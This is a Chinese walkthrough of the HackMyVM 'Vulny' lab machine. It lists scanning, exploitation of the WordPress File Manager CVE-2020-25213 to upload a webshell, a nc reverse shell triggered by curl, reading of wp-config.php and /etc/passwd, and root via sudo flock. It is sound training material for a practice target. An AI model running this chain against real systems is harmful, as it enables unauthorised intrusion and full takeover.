靶机信息
下载地址:
https://hackmyvm.eu/machines/machine.php?vm=Vulny
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx
靶场: HackMyVm.eu
靶机名称: Vulny
难度: 简单
发布时间: 2020年10月15日
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only
靶机:Vbox linux IP自动获取 网卡host-Only
信息收集
扫描主机
扫描局域网内的靶机IP地址
sudo arp-scan -I eth1 10.0.0.0/24
扫描到主机地址为10.0.0.143
扫描端口
扫描靶机开放的服务端口
sudo nmap -sC -sV -p- 10.0.0.143 -oN nmap.log
扫描到开放80和33060端口,先来看看80端口
Web渗透
访问后打开apache默认页面,做个目录扫描
gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.143 -x php,html,txt,zip
发现secret目录,访问看下
提示在某个配置页面下有账号密码,继续目录扫描
gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.143/secret -x php,html,txt,zip
未发现配置文件,继续扫描
gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.143/secret/wp-content -x php,html,txt,zip
扫描到多个目录,打开看看
http://10.0.0.143/secret/wp-content/uploads/2020/10/
在uploads目录下找到一个压缩包,下载下来看看
wget http://10.0.0.143/secret/wp-content/uploads/2020/10/wp-file-manager-6.O.zip
unzip wp-file-manager-6.O.zip
cd wp-file-manager-6.O
ls
查看file_folder_manager.php文件内容
gedit file_folder_manager.php
发现是文件管理插件,版本是6.0这个版本存在远程代码执行漏洞,来看看如何利用
找到exp,下载后执行exp,这个exp有问题,我到github上又找了一个
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213.git
./wp-file-manager-CVE-2020-25213.sh -h
先来验证下是否存在漏洞
./wp-file-manager-exploit.sh --wp_url http://10.0.0.143/secret --check
发现漏洞,上传webshell
./wp-file-manager-exploit.sh --wp_url http://10.0.0.143/secret -f /tmp/shell.php --verbose
上传成功,先在攻击机上监听4444端口,再访问shell.php触发反弹
1。攻击机监听4444端口
nc -lvvp 4444
2。访问shell.php
curl http://10.0.0.143/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php
反弹成功,来找下敏感信息/var/www/html目录下没有wordpress,查找下放哪里了
find / -name wordpress |grep -v 'Permission denied'
找到程序存放位置,
cd /usr/share/wordpress
cat wp-config.php
wp配置文件中未找到数据库账号密码,但是发现一段不应该存在的注释,猜测是secret目录提示的密码,再来看看哪些用户可以登录
cat /etc/passwd |grep bash
发现用户adrian,切换到adrian账号
拿到adrian权限 ,先来切换到交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键
stty raw -echo;fg
reset
切换完成,来查找敏感信息
cd ~
ls
cat user.txt
拿到user.txt,继续找
sudo -l
发现可以使用root身份执行flock文件,先来看看这个文件是什么
/usr/bin/flock
/usr/bin/flock --help
发现flock可以执行命令,先来看看flock如何执行命令
https://gtfobins.github.io/gtfobins/flock/
来验证一下
sudo -u root flock -u / /bin/bash
id
cat /root/root.txt
提权成功,拿到root.txt,游戏结束。
原文始发于微信公众号(伏波路上学安全):渗透测试练习No.76 Vulny
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论